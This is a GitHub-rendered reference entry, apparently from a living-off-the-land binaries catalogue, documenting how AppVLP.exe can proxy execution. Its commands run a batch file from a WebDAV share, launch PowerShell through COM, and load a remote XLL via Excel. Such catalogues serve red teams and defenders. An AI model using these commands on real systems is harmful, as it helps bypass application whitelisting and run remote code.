Skip to content

Latest commit

 

History

History
24 lines (17 loc) · 885 Bytes

appvlp.exe.md

File metadata and controls

24 lines (17 loc) · 885 Bytes

Appvlp.exe

  • Functions: Execute

AppVLP.exe \\webdav\calc.bat
Executes calc.bat through AppVLP.exe

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.